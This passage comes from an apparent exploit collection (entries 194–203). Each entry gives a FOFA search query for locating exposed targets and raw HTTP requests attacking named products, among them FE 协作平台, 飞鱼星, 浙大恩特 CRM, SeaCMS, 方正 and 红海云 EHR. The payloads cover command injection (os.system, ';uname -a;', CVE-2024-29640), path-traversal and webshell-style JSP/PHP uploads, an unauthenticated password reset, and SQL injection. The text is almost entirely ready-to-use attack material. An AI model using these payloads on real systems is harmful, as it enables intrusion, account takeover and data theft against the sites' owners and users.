Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--